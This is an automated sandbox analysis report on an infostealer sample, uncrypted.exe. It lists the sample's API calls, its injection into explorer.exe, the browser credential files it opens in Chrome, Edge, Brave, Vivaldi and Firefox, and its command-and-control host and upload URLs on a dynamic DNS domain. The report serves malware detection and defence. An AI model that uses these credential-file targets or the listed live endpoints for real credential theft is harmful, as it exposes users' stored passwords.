Source: C:\Users\user\Desktop\uncrypted.exe | Code function: CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,CloseHandle,CreateEventW,CreateThread,ResumeThread,CloseHandle,CloseHandle,___crtGetLocaleInfoEx,2_2_00417D70
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: LocalAlloc,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,2_2_004215C0
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: ___crtGetLocaleInfoEx,WaitForSingleObject,___crtGetLocaleInfoEx,WaitForSingleObject,WaitForSingleObject,CloseHandle,2_2_00421DA0
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: LocalAlloc,und_memcpy,CreateEventW,LocalFree,CloseHandle,LocalFree,CloseHandle,___crtGetLocaleInfoEx,LocalFree,CloseHandle,CloseHandle,LocalFree,2_2_00420EE0
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: ___crtGetLocaleInfoEx,2_2_00420760
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: LocalAlloc,wsprintfA,___crtGetLocaleInfoEx,___crtGetLocaleInfoEx,und_memcpy,LocalFree,LocalFree,2_2_00421700
Source: C:\Users\user\Desktop\uncrypted.exe | Queries volume information: C:\Users\user\Desktop\uncrypted.exe VolumeInformation
Source: C:\Users\user\Desktop\uncrypted.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\uncrypted.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\uncrypted.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\uncrypted.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Desktop\uncrypted.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Desktop\uncrypted.exe | Code function: 2_2_0042C41F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0042C41F
Source: C:\Windows\explorer.exe | Code function: 3_2_011B5AD0 LocalAlloc,LoadLibraryW,LocalFree,GetProcAddress,LocalFree,RtlGetVersion,LocalFree,GetUserGeoID,gethostname,gethostbyname,GetComputerNameExW,GetUserNameW,GetTickCount64,LocalFree,3_2_011B5AD0
Source: C:\Windows\explorer.exe | Code function: 4_2_00F3A564 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,4_2_00F3A564
Source: C:\Windows\explorer.exe | Code function: 3_2_011BF6DC HeapCreate,GetVersion,HeapSetInformation,3_2_011BF6DC
Source: C:\Users\user\Desktop\uncrypted.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

Source: Yara match | File source: 2.2.uncrypted.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.uncrypted.exe.11edea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.uncrypted.exe.4081f90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.uncrypted.exe.41021c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.explorer.exe.1190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.uncrypted.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: uncrypted.exe PID: 3856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: uncrypted.exe PID: 2892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5060, type: MEMORYSTR
Source: C:\Windows\explorer.exe | Code function: ENCWCHAR \Google\Chrome\User Data\Default\Login Data 4_2_00E73FC0
Source: C:\Windows\explorer.exe | Code function: LocalAlloc,LocalAlloc,LocalAlloc,SHGetKnownFolderPath,LocalAlloc,LocalAlloc,GetPrivateProfileStringW,LocalAlloc,_snprintf,LocalAlloc,_snprintf,CreateFileA,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,type_info::_name_internal_method,type_info::_name_internal_method,MultiByteToWideChar,wsprintfW,LocalFree,CloseHandle,LocalFree,LocalFree,LocalFree,LocalFree,CoTaskMemFree,LocalFree,LocalFree,LocalFree, encryptedPassword 4_2_00E7ADF0
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\pkcs11.txt
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\pkcs11.txt
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Login Data
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

                    Remote Access Functionality

Source: Yara match | File source: 2.2.uncrypted.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.uncrypted.exe.11edea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.uncrypted.exe.4081f90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.uncrypted.exe.41021c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.explorer.exe.1190000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.uncrypted.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2055171521.0000000003F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3291531649.00000000011C8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2055171521.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2055171521.0000000003FFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2041385974.00000000011C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2041122621.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2054936122.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: uncrypted.exe PID: 3856, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: uncrypted.exe PID: 2892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5060, type: MEMORYSTR
MITRE ATT&CK matrix by tactic (a number before a technique is the count the matrix shows for it):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 23 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 311 Process Injection; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 1 Modify Registry; 31 Virtualization/Sandbox Evasion; 311 Process Injection
Credential Access: 2 OS Credential Dumping; 21 Input Capture; 2 Credentials In Files; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 125 System Information Discovery; 131 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 11 Process Discovery; 1 System Owner/User Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 21 Input Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 12 Ingress Tool Transfer; 2 Encrypted Channel; 11 Non-Standard Port; 3 Non-Application Layer Protocol; 223 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1582630, sample uncrypted.exe, start date 31/12/2024, architecture WINDOWS, score 100). Process chain: uncrypted.exe starts uncrypted.exe, which starts explorer.exe, which starts a second explorer.exe. Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures; Uses dynamic DNS services (jholo.duckdns.org). Second uncrypted.exe: dropped C:\Users\user\AppData\...\uncrypted.exe.log (ASCII); Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found evasive API chain (may stop execution after checking mutex); Switches to a custom stack to bypass stack traces; Maps a DLL or memory area into another process. First explorer.exe: connects to jholo.duckdns.org 5.89.185.156, ports 49704, 49705, 49706 (VODAFONE-IT-ASNIT, Italy); Found evasive API chain (may stop execution after checking mutex); Contains functionality to steal saved passwords of Firefox; Contains functionality to steal Chrome passwords or cookies; 2 other signatures. Second explorer.exe: System process connects to network (likely due to code injection or exploit); Tries to harvest and steal browser information (history, passwords, etc).

Source | Detection | Scanner | Label
uncrypted.exe | 61% | Virustotal |
uncrypted.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
uncrypted.exe | 100% | Avira | TR/Dropper.MSIL.Gen
uncrypted.exe | 100% | Joe Sandbox ML |
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
http://jholo.duckdns.org:8181/upload.phporage | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/upload.phpy=part | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/llu | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/PASSWORDRECOVERY32EXE.EXEhttp://jholo.duckdns.org:8181/PASSWORDRECOVER | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/upload.phphic | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/upload.php | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/upload.phpcp= | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org/upload.php | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/n | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/ | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/L | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/PASSWORDRECOVERY64EXE.EXE | 0% | Avira URL Cloud | safe
jholo.duckdns.org | 0% | Avira URL Cloud | safe
http://jholo.duckdns.org:8181/upload.php8 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
jholo.duckdns.org | 5.89.185.156 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://jholo.duckdns.org/upload.php | true | Avira URL Cloud: safe | unknown
jholo.duckdns.org | true | Avira URL Cloud: safe | unknown
Name | Malicious | Antivirus Detection | Reputation (memory sources on the following line)

http://jholo.duckdns.org:8181/llu | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/upload.php | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2084150348.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083994285.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084578102.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2085034739.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2084841084.0000000000F58000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.2085061884.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2084288266.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/upload.phpy=part | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/n | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/upload.phphic | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/ | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/upload.phporage | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, 00000004.00000002.2084578102.0000000000C69000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/PASSWORDRECOVERY32EXE.EXEhttp://jholo.duckdns.org:8181/PASSWORDRECOVER | false | Avira URL Cloud: safe | unknown
  Source: uncrypted.exe, 00000000.00000002.2055171521.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.0000000004175000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000000.00000002.2055171521.00000000040F5000.00000004.00000800.00020000.00000000.sdmp, uncrypted.exe, 00000002.00000002.2041122621.0000000000475000.00000040.00000400.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291546585.00000000011EF000.00000004.00001000.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/upload.phpcp= | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/L | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/PASSWORDRECOVERY64EXE.EXE | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, explorer.exe, 00000003.00000003.2659390305.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291325405.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291451466.0000000000F84000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/l | false | | unknown
  Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp
http://jholo.duckdns.org:8181/upload.php8 | false | Avira URL Cloud: safe | unknown
  Source: explorer.exe, 00000004.00000002.2084613311.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2083842360.0000000000D36000.00000004.00000020.00020000.00000000.sdmp
IP | Domain | Country | ASN | ASN Name | Malicious
5.89.185.156 | jholo.duckdns.org | Italy | 30722 | VODAFONE-IT-ASNIT | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582630
Start date and time: 2024-12-31 07:32:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: uncrypted.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@7/2@3/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 67
• Number of non-executed functions: 327
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45, 172.202.163.200
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
Time | Type | Description
01:33:00 | API Interceptor | 1x Sleep call for process: uncrypted.exe modified
01:33:02 | API Interceptor | 6x Sleep call for process: explorer.exe modified
                        No context
                        No context
Match: VODAFONE-IT-ASNIT

Associated Sample Name / URL | Detection | Threat Name | Context
kwari.mips.elf | malicious | Unknown | 93.150.243.45
botx.mips.elf | malicious | Mirai | 37.178.147.159
botx.x86.elf | malicious | Mirai | 109.119.42.246
star.ppc.elf | malicious | Mirai, Moobot | 5.89.85.231
mpsl.elf | malicious | Mirai, Moobot | 5.95.28.147
db0fa4b8db0333367e9bda3ab68b8042.spc.elf | malicious | Mirai, Gafgyt | 37.118.210.45
loligang.sh4.elf | malicious | Mirai | 188.217.53.181
loligang.mpsl.elf | malicious | Mirai | 93.147.74.169
nabarm7.elf | malicious | Unknown | 91.80.70.20
splarm5.elf | malicious | Unknown | 5.90.45.75
                        No context
                        No context
Process: C:\Users\user\Desktop\uncrypted.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1299
Entropy (8bit): 5.342376182732888
Encrypted: false
SSDEEP: 24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4xLE4qE4j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0H6
MD5: 15A85EF9F3C51B739D8B32F5D653907F
SHA1: 4B0589739321E819A9D7B2C922D2C7C333C3DC41
SHA-256: C4ECDB3A724CE069DB7B3473D4690DCB37E74B76A957C64F3D9B5B07655AE544
SHA-512: E102D29E8B0DE5E0653C42F94FFAFCBEE4100668D8A0AB2A5C845DDC0759E68D86F044887932A93C1AA2520C877CA48DAFE2559A3A592B88DCDAAFE5AEE6C2BC
Malicious: true
Reputation: low
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                        Process:C:\Windows\explorer.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):51200
                        Entropy (8bit):0.8746135976761988
                        Encrypted:false
                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ .. (the rest of the preview is non-printable bytes, elided)
                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.5752388995368864
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        • Win32 Executable (generic) a (10002005/4) 49.96%
                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:uncrypted.exe
                        File size:1'028'096 bytes
                        MD5:84e8a17e39ef16dce73da924ced012d5
                        SHA1:630f2eb6046e05450c10af2a4ae01840e0a19405
                        SHA256:bebe3cadd1d51412d055ba11ebc64091c45e2ef47dbcc7135d2d762f26a466c2
                        SHA512:637d28f7ecc48a606813301143c440f27a0de999284cad0df6467533a7440ac56cd343b7d99103f3d8bcddf952bfa4794003d8740a7b21090443aafa5fddf24c
                        SSDEEP:24576:81sPbvgcpRe4WuI4i2RlQCeUAO9UKEiLzoOZuC:81sPbvgcpRquIJ2XQz09UMLQ
                        TLSH:B425233BB31067A6C79983FE5042FA5426C889808F4BBF65C55C62610F7AFA65F0F463
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....meg................................. ........@.. ..............................9 ....@................................
                        Icon Hash:21059d3565d95f70
                        Entrypoint:0x4f11ee
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x67656DDC [Fri Dec 20 13:15:08 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                        Instruction
                        jmp dword ptr [00402000h]
                        (the remaining bytes of the entry-point listing are zero padding, which the disassembler renders as repeated "add byte ptr [eax], al")
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf11a0 | 0x4b | .text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf2000 | 0x1800 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf4000 | 0xc | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x2048 | .text
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x2000 | 0xef1f4 | 0xef200 | 71d1d2af03d1df3f866fc5e02edc6873 | False | 0.9048104253789859 | data | 7.563976267050098 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc | 0xf2000 | 0x1800 | 0x1800 | 296b3e1a60010510377ece4cf24e4502 | False | 0.5572916666666666 | data | 5.686165936068512 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0xf4000 | 0xc | 0x200 | f02121ed18c5741fce985a42fb9e3a8a | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
